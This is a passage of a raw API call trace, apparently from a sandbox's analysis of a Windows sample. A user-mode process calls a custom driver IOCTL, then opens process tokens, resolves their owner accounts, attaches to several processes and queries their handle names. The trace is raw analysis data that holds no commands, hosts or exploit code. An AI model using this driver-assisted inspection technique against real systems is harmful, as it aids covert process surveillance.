ObjectNameInfo=0xffffe0006a6c2044, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a6c2044, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0291.655] ObfDereferenceObject (Object=0xffffe000691c4ba0) returned 0x7ffe [0291.655] IoCompleteRequest () returned 0x0 [0291.655] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x534) returned 0x188 [0291.655] DeviceIoControl (in: hDevice=0x14c, dwIoControlCode=0x8335000c, lpInBuffer=0x14d3d0*, nInBufferSize=0x8, lpOutBuffer=0x14d3d8, nOutBufferSize=0x8, lpBytesReturned=0x14d360, lpOverlapped=0x0 | out: lpInBuffer=0x14d3d0*, lpOutBuffer=0x14d3d8*, lpBytesReturned=0x14d360*=0x8, lpOverlapped=0x0) returned 1 [0291.655] ObReferenceObjectByHandle (in: Handle=0x188, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf498, HandleInformation=0x0 | out: Object=0xffffd000ac0cf498*=0xffffe000691d3840, HandleInformation=0x0) returned 0x0 [0291.655] ObOpenObjectByPointer (in: Object=0xffffe000691d3840, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xffffd000ac0cf4a0 | out: Handle=0xffffd000ac0cf4a0*=0xffffffff80000704) returned 0x0 [0291.656] ObfDereferenceObject (Object=0xffffe000691d3840) returned 0x2fff2 [0291.656] ZwOpenProcessToken (in: ProcessHandle=0xffffffff80000704, DesiredAccess=0x8, TokenHandle=0xffffe0006a473440 | out: TokenHandle=0xffffe0006a473440*=0x18c) returned 0x0 [0291.656] ZwClose (Handle=0xffffffff80000704) returned 0x0 [0291.656] IoCompleteRequest () returned 0x0 [0291.656] GetTokenInformation (in: TokenHandle=0x18c, TokenInformationClass=0x1, TokenInformation=0x14d3f0, TokenInformationLength=0x800, ReturnLength=0x14d3c8 | out: TokenInformation=0x14d3f0, ReturnLength=0x14d3c8) returned 1 [0291.656] LookupAccountSidW (in: lpSystemName="", Sid=0x14d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0xf7)), Name=0x14ecb0, cchName=0x14d3c0, ReferencedDomainName=0x14e690, cchReferencedDomainName=0x14e440, peUse=0x14d3e0 | out: Name="CIiHmnxMn6Ps", cchName=0x14d3c0, ReferencedDomainName="LHNIWSJ", cchReferencedDomainName=0x14e440, peUse=0x14d3e0) returned 1 [0291.656] CloseHandle (hObject=0x18c) returned 1 [0291.656] CloseHandle (hObject=0x188) returned 1 [0291.656] PsLookupProcessByProcessId (in: ProcessId=0x534, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0291.656] PsAcquireProcessExitSynchronization () returned 0x0 [0291.656] KeStackAttachProcess (in: PROCESS=0xffffe000691d3840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe000691d3840, ApcState=0xffffd000ac0cf400) [0291.656] ObReferenceObjectByHandle (in: Handle=0x14, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00073ce7800, HandleInformation=0x0) returned 0x0 [0291.656] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0291.657] PsReleaseProcessExitSynchronization () returned 0x2 [0291.657] ObfDereferenceObject (Object=0xffffe000691d3840) returned 0x27ff0 [0291.657] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006840e044, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006840e044, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0291.657] ObfDereferenceObject (Object=0xffffe00073ce7800) returned 0x7ffe [0291.657] IoCompleteRequest () returned 0x0 [0291.657] PsLookupProcessByProcessId (in: ProcessId=0x534, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0291.657] PsAcquireProcessExitSynchronization () returned 0x0 [0291.657] KeStackAttachProcess (in: PROCESS=0xffffe000691d3840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe000691d3840, ApcState=0xffffd000ac0cf400) [0291.657] ObReferenceObjectByHandle (in: Handle=0x28, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069158e00, HandleInformation=0x0) returned 0x0 [0291.657] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0291.657] PsReleaseProcessExitSynchronization () returned 0x2 [0291.657] ObfDereferenceObject (Object=0xffffe000691d3840) returned 0x27fef [0291.657] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a65f7c4, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a65f7c4, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0291.657] ObfDereferenceObject (Object=0xffffe00069158e00) returned 0x7ffe [0291.657] IoCompleteRequest () returned 0x0 [0291.657] PsLookupProcessByProcessId (in: ProcessId=0x534, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0291.657] PsAcquireProcessExitSynchronization () returned 0x0 [0291.657] KeStackAttachProcess (in: PROCESS=0xffffe000691d3840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe000691d3840, ApcState=0xffffd000ac0cf400) [0291.657] ObReferenceObjectByHandle (in: Handle=0xb4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe000691f9750, HandleInformation=0x0) returned 0x0 [0291.657] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0291.657] PsReleaseProcessExitSynchronization () returned 0x2 [0291.657] ObfDereferenceObject (Object=0xffffe000691d3840) returned 0x27fee [0291.657] ObQueryNameString (in: Object=0xffffe00067e4f240, ObjectNameInfo=0xffffe0006a6177c4, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a6177c4, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0291.657] ObfDereferenceObject (Object=0xffffe000691f9750) returned 0x7ffe [0291.657] IoCompleteRequest () returned 0x0 [0291.657] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xb3c) returned 0x188 [0291.657] DeviceIoControl (in: hDevice=0x14c, dwIoControlCode=0x8335000c, lpInBuffer=0x14d3d0*, nInBufferSize=0x8, lpOutBuffer=0x14d3d8, nOutBufferSize=0x8, lpBytesReturned=0x14d360, lpOverlapped=0x0 | out: lpInBuffer=0x14d3d0*, lpOutBuffer=0x14d3d8*, lpBytesReturned=0x14d360*=0x8, lpOverlapped=0x0) returned 1 [0291.657] ObReferenceObjectByHandle (in: Handle=0x188, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf498, HandleInformation=0x0 | out: Object=0xffffd000ac0cf498*=0xffffe00079221840, HandleInformation=0x0) returned 0x0 [0291.657] ObOpenObjectByPointer (in: Object=0xffffe00079221840, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xffffd000ac0cf4a0 | out: Handle=0xffffd000ac0cf4a0*=0xffffffff80000704) returned 0x0 [0291.657] ObfDereferenceObject (Object=0xffffe00079221840) returned 0x2fff2 [0291.657] ZwOpenProcessToken (in: ProcessHandle=0xffffffff80000704, DesiredAccess=0x8, TokenHandle=0xffffe0006a473440 | out: TokenHandle=0xffffe0006a473440*=0x18c) returned 0x0 [0291.657] ZwClose (Handle=0xffffffff80000704) returned 0x0 [0291.657] IoCompleteRequest () returned 0x0 [0291.657] GetTokenInformation (in: TokenHandle=0x18c, TokenInformationClass=0x1, TokenInformation=0x14d3f0, TokenInformationLength=0x800, ReturnLength=0x14d3c8 | out: TokenInformation=0x14d3f0, ReturnLength=0x14d3c8) returned 1 [0291.657] LookupAccountSidW (in: lpSystemName="", Sid=0x14d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0xf7)), Name=0x14ecb0, cchName=0x14d3c0, ReferencedDomainName=0x14e690, cchReferencedDomainName=0x14e440, peUse=0x14d3e0 | out: Name="CIiHmnxMn6Ps", cchName=0x14d3c0, ReferencedDomainName="LHNIWSJ", cchReferencedDomainName=0x14e440, peUse=0x14d3e0) returned 1 [0291.658] CloseHandle (hObject=0x18c) returned 1 [0291.658] CloseHandle (hObject=0x188) returned 1 [0291.658] PsLookupProcessByProcessId (in: ProcessId=0xb3c, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0291.658] PsAcquireProcessExitSynchronization () returned 0x0 [0291.658] KeStackAttachProcess (in: PROCESS=0xffffe00079221840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00079221840, ApcState=0xffffd000ac0cf400) [0291.658] ObReferenceObjectByHandle (in: Handle=0x14, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069f32190, HandleInformation=0x0) returned 0x0 [0291.658] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0291.658] PsReleaseProcessExitSynchronization () returned 0x2 [0291.658] ObfDereferenceObject (Object=0xffffe00079221840) returned 0x27ff0 [0291.658] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a6a1044, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a6a1044, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0291.658] ObfDereferenceObject (Object=0xffffe00069f32190) returned 0x7ffe [0291.658] IoCompleteRequest () returned 0x0 [0291.659] PsLookupProcessByProcessId (in: ProcessId=0xb3c, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0291.659] PsAcquireProcessExitSynchronization () returned 0x0 [0291.659] KeStackAttachProcess (in: PROCESS=0xffffe00079221840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00079221840, ApcState=0xffffd000ac0cf400) [0291.659] ObReferenceObjectByHandle (in: Handle=0x28, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069370500, HandleInformation=0x0) returned 0x0 [0291.659] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0291.659] PsReleaseProcessExitSynchronization () returned 0x2 [0291.659] ObfDereferenceObject (Object=0xffffe00079221840) returned 0x27fef [0291.659] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a714044, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a714044, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0291.659] ObfDereferenceObject (Object=0xffffe00069370500) returned 0x7ffe [0291.659] IoCompleteRequest () returned 0x0 [0291.659] PsLookupProcessByProcessId (in: ProcessId=0xb3c, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0291.659] PsAcquireProcessExitSynchronization () returned 0x0 [0291.659] KeStackAttachProcess (in: PROCESS=0xffffe00079221840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00079221840, ApcState=0xffffd000ac0cf400) [0291.659] ObReferenceObjectByHandle (in: Handle=0xb4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe000691fa720, HandleInformation=0x0) returned 0x0 [0291.659] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0291.659] PsReleaseProcessExitSynchronization () returned 0x2 [0291.659] ObfDereferenceObject (Object=0xffffe00079221840) returned 0x27fee [0291.659] ObQueryNameString (in: Object=0xffffe00067e4f240, ObjectNameInfo=0xffffe0006a3d87c4, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a3d87c4, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0291.659] ObfDereferenceObject (Object=0xffffe000691fa720) returned 0x7ffe [0291.659] IoCompleteRequest () returned 0x0 [0291.659] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x8a4) returned 0x188 [0291.659] DeviceIoControl (in: hDevice=0x14c, dwIoControlCode=0x8335000c, lpInBuffer=0x14d3d0*, nInBufferSize=0x8, lpOutBuffer=0x14d3d8, nOutBufferSize=0x8, lpBytesReturned=0x14d360, lpOverlapped=0x0 | out: lpInBuffer=0x14d3d0*, lpOutBuffer=0x14d3d8*, lpBytesReturned=0x14d360*=0x8, lpOverlapped=0x0) returned 1 [0291.659] ObReferenceObjectByHandle (in: Handle=0x188, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf498, HandleInformation=0x0 | out: Object=0xffffd000ac0cf498*=0xffffe000691fd180, HandleInformation=0x0) returned 0x0 [0291.659] ObOpenObjectByPointer (in: Object=0xffffe000691fd180, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xffffd000ac0cf4a0 | out: Handle=0xffffd000ac0cf4a0*=0xffffffff80000704) returned 0x0 [0291.659] ObfDereferenceObject (Object=0xffffe000691fd180) returned 0x2fff2 [0291.659] ZwOpenProcessToken (in: ProcessHandle=0xffffffff80000704, DesiredAccess=0x8, TokenHandle=0xffffe0006a473440 | out: TokenHandle=0xffffe0006a473440*=0x18c) returned 0x0 [0291.659] ZwClose (Handle=0xffffffff80000704) returned 0x0 [0291.659] IoCompleteRequest () returned 0x0 [0291.659] GetTokenInformation (in: TokenHandle=0x18c, TokenInformationClass=0x1, TokenInformation=0x14d3f0, TokenInformationLength=0x800, ReturnLength=0x14d3c8 | out: TokenInformation=0x14d3f0, ReturnLength=0x14d3c8) returned 1 [0291.659] LookupAccountSidW (in: lpSystemName="", Sid=0x14d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0xf7)), Name=0x14ecb0, cchName=0x14d3c0, ReferencedDomainName=0x14e690, cchReferencedDomainName=0x14e440, peUse=0x14d3e0 | out: Name="CIiHmnxMn6Ps", cchName=0x14d3c0, ReferencedDomainName="LHNIWSJ", cchReferencedDomainName=0x14e440, peUse=0x14d3e0) returned 1 [0291.660] CloseHandle (hObject=0x18c) returned 1 [0291.660] CloseHandle (hObject=0x188) returned 1 [0291.660] PsLookupProcessByProcessId (in: ProcessId=0x8a4, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0291.660] PsAcquireProcessExitSynchronization () returned 0x0 [0291.660] KeStackAttachProcess (in: PROCESS=0xffffe000691fd180, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe000691fd180, ApcState=0xffffd000ac0cf400) [0291.660] ObReferenceObjectByHandle (in: Handle=0x14, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069237e80, HandleInformation=0x0) returned 0x0 [0291.660] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0291.660] PsReleaseProcessExitSynchronization () returned 0x2 [0291.660] ObfDereferenceObject (Object=0xffffe000691fd180) returned 0x27ff0 [0291.660] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a7257c4, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a7257c4, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0291.660] ObfDereferenceObject (Object=0xffffe00069237e80) returned 0x7ffe [0291.660] IoCompleteRequest () returned 0x0 [0291.660] PsLookupProcessByProcessId (in: ProcessId=0x8a4, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0291.660] PsAcquireProcessExitSynchronization () returned 0x0 [0291.660] KeStackAttachProcess (in: PROCESS=0xffffe000691fd180, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe000691fd180, ApcState=0xffffd000ac0cf400) [0291.660] ObReferenceObjectByHandle (in: Handle=0x28, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe000690b6f20, HandleInformation=0x0) returned 0x0 [0291.660] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0291.660] PsReleaseProcessExitSynchronization () returned 0x2 [0291.660] ObfDereferenceObject (Object=0xffffe000691fd180) returned 0x27fef [0291.660] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a6bc044, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a6bc044, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0291.660] ObfDereferenceObject (Object=0xffffe000690b6f20) returned 0x7ffe [0291.660] IoCompleteRequest () returned 0x0 [0291.660] PsLookupProcessByProcessId (in: ProcessId=0x8a4, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0291.660] PsAcquireProcessExitSynchronization () returned 0x0 [0291.660] KeStackAttachProcess (in: PROCESS=0xffffe000691fd180, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe000691fd180, ApcState=0xffffd000ac0cf400) [0291.660] ObReferenceObjectByHandle (in: Handle=0xb4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe000691294c0, HandleInformation=0x0) returned 0x0 [0291.660] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0291.660] PsReleaseProcessExitSynchronization () returned 0x2 [0291.660] ObfDereferenceObject (Object=0xffffe000691fd180) returned 0x27fee [0291.660] ObQueryNameString (in: Object=0xffffe00067e4f240, ObjectNameInfo=0xffffe0006a717044, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a717044, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0291.660] ObfDereferenceObject (Object=0xffffe000691294c0) returned 0x7ffe [0291.660] IoCompleteRequest () returned 0x0 [0291.661] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x380) returned 0x188 [0291.661] DeviceIoControl (in: hDevice=0x14c, dwIoControlCode=0x8335000c, lpInBuffer=0x14d3d0*, nInBufferSize=0x8, lpOutBuffer=0x14d3d8, nOutBufferSize=0x8, lpBytesReturned=0x14d360, lpOverlapped=0x0 | out: lpInBuffer=0x14d3d0*, lpOutBuffer=0x14d3d8*, lpBytesReturned=0x14d360*=0x8, lpOverlapped=0x0) returned 1 [0291.661] ObReferenceObjectByHandle (in: Handle=0x188, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf498, HandleInformation=0x0 | out: Object=0xffffd000ac0cf498*=0xffffe00069095840, HandleInformation=0x0) returned 0x0 [0291.661] ObOpenObjectByPointer (in: Object=0xffffe00069095840, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xffffd000ac0cf4a0 | out: Handle=0xffffd000ac0cf4a0*=0xffffffff80000704) returned 0x0 [0291.661] ObfDereferenceObject (Object=0xffffe00069095840) returned 0x2fff2 [0291.661] ZwOpenProcessToken (in: ProcessHandle=0xffffffff80000704, DesiredAccess=0x8, TokenHandle=0xffffe0006a473440 | out: TokenHandle=0xffffe0006a473440*=0x18c) returned 0x0 [0291.661] ZwClose (Handle=0xffffffff80000704) returned 0x0 [0291.661] IoCompleteRequest () returned 0x0 [0291.661] GetTokenInformation (in: TokenHandle=0x18c, TokenInformationClass=0x1, TokenInformation=0x14d3f0, TokenInformationLength=0x800, ReturnLength=0x14d3c8 | out: TokenInformation=0x14d3f0, ReturnLength=0x14d3c8) returned 1 [0291.661] LookupAccountSidW (in: lpSystemName="", Sid=0x14d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0xf7)), Name=0x14ecb0, cchName=0x14d3c0, ReferencedDomainName=0x14e690, cchReferencedDomainName=0x14e440, peUse=0x14d3e0 | out: Name="CIiHmnxMn6Ps", cchName=0x14d3c0, ReferencedDomainName="LHNIWSJ", cchReferencedDomainName=0x14e440, peUse=0x14d3e0) returned 1 [0291.661] CloseHandle (hObject=0x18c) returned 1 [0291.661] CloseHandle (hObject=0x188) returned 1 [0291.661] PsLookupProcessByProcessId (in: ProcessId=0x380, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0291.661] PsAcquireProcessExitSynchronization () returned 0x0 [0291.661] KeStackAttachProcess (in: PROCESS=0xffffe00069095840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069095840, ApcState=0xffffd000ac0cf400) [0291.661] ObReferenceObjectByHandle (in: Handle=0x14, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe000690954e0, HandleInformation=0x0) returned 0x0 [0291.661] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0291.661] PsReleaseProcessExitSynchronization () returned 0x2 [0291.662] ObfDereferenceObject (Object=0xffffe00069095840) returned 0x27ff0 [0291.662] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a625044, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a625044, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0291.662] ObfDereferenceObject (Object=0xffffe000690954e0) returned 0x7ffe [0291.662] IoCompleteRequest () returned 0x0 [0291.662] PsLookupProcessByProcessId (in: ProcessId=0x380, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0291.662] PsAcquireProcessExitSynchronization () returned 0x0 [0291.662] KeStackAttachProcess (in: PROCESS=0xffffe00069095840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069095840, ApcState=0xffffd000ac0cf400) [0291.662] ObReferenceObjectByHandle (in: Handle=0x28, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe000690956d0, HandleInformation=0x0) returned 0x0 [0291.662] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0291.662] PsReleaseProcessExitSynchronization () returned 0x2 [0291.662] ObfDereferenceObject (Object=0xffffe00069095840) returned 0x27fef [0291.662] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a351044, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a351044, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0291.662] ObfDereferenceObject (Object=0xffffe000690956d0) returned 0x7ffe [0291.662] IoCompleteRequest () returned 0x0 [0291.662] PsLookupProcessByProcessId (in: ProcessId=0x380, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0291.662] PsAcquireProcessExitSynchronization () returned 0x0 [0291.662] KeStackAttachProcess (in: PROCESS=0xffffe00069095840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069095840, ApcState=0xffffd000ac0cf400) [0291.662] ObReferenceObjectByHandle (in: Handle=0xb4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe000691dba30, HandleInformation=0x0) returned 0x0 [0291.662] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0291.662] PsReleaseProcessExitSynchronization () returned 0x2 [0291.662] ObfDereferenceObject (Object=0xffffe00069095840) returned 0x27fee [0291.662] ObQueryNameString (in: Object=0xffffe00067e4f240, ObjectNameInfo=0xffffe0006a5317c4, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a5317c4, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0291.662] ObfDereferenceObject (Object=0xffffe000691dba30) returned 0x7ffe [0291.662] IoCompleteRequest () returned 0x0 [0291.662] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x854) returned 0x188 [0291.662] DeviceIoControl (in: hDevice=0x14c, dwIoControlCode=0x8335000c, lpInBuffer=0x14d3d0*, nInBufferSize=0x8, lpOutBuffer=0x14d3d8, nOutBufferSize=0x8, lpBytesReturned=0x14d360, lpOverlapped=0x0 | out: lpInBuffer=0x14d3d0*, lpOutBuffer=0x14d3d8*, lpBytesReturned=0x14d360*=0x8, lpOverlapped=0x0) returned 1 [0291.662] ObReferenceObjectByHandle (in: Handle=0x188, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf498, HandleInformation=0x0 | out: Object=0xffffd000ac0cf498*=0xffffe0007a74d840, HandleInformation=0x0) returned 0x0 [0291.662] ObOpenObjectByPointer (in: Object=0xffffe0007a74d840, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xffffd000ac0cf4a0 | out: Handle=0xffffd000ac0cf4a0*=0xffffffff80000704) returned 0x0 [0291.662] ObfDereferenceObject (Object=0xffffe0007a74d840) returned 0x2fff2 [0291.662] ZwOpenProcessToken (in: ProcessHandle=0xffffffff80000704, DesiredAccess=0x8, TokenHandle=0xffffe0006a473440 | out: TokenHandle=0xffffe0006a473440*=0x18c) returned 0x0 [0291.662] ZwClose (Handle=0xffffffff80000704) returned 0x0 [0291.662] IoCompleteRequest () returned 0x0 [0291.662] GetTokenInformation (in: TokenHandle=0x18c, TokenInformationClass=0x1, TokenInformation=0x14d3f0, TokenInformationLength=0x800, ReturnLength=0x14d3c8 | out: TokenInformation=0x14d3f0, ReturnLength=0x14d3c8) returned 1 [0291.662] LookupAccountSidW (in: lpSystemName="", Sid=0x14d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0xf7)), Name=0x14ecb0, cchName=0x14d3c0, ReferencedDomainName=0x14e690, cchReferencedDomainName=0x14e440, peUse=0x14d3e0 | out: Name="CIiHmnxMn6Ps", cchName=0x14d3c0, ReferencedDomainName="LHNIWSJ", cchReferencedDomainName=0x14e440, peUse=0x14d3e0) returned 1 [0291.663] CloseHandle (hObject=0x18c) returned 1 [0291.663] CloseHandle (hObject=0x188) returned 1 [0291.663] PsLookupProcessByProcessId (in: ProcessId=0x854, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0291.663] PsAcquireProcessExitSynchronization () returned 0x0 [0291.663] KeStackAttachProcess (in: PROCESS=0xffffe0007a74d840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe0007a74d840, ApcState=0xffffd000ac0cf400) [0291.663] ObReferenceObjectByHandle (in: Handle=0x14, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006a073090, HandleInformation=0x0) returned 0x0 [0291.663] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0291.663] PsReleaseProcessExitSynchronization () returned 0x2 [0291.663] ObfDereferenceObject (Object=0xffffe0007a74d840) returned 0x27ff0 [0291.663] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a4f5044, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a4f5044, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0291.663] ObfDereferenceObject (Object=0xffffe0006a073090) returned 0x7ffe [0291.663] IoCompleteRequest () returned 0x0 [0291.663] PsLookupProcessByProcessId (in: ProcessId=0x854, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0291.663] PsAcquireProcessExitSynchronization () returned 0x0 [0291.663] KeStackAttachProcess (in: PROCESS=0xffffe0007a74d840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe0007a74d840, ApcState=0xffffd000ac0cf400) [0291.664] ObReferenceObjectByHandle (in: Handle=0x28, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: 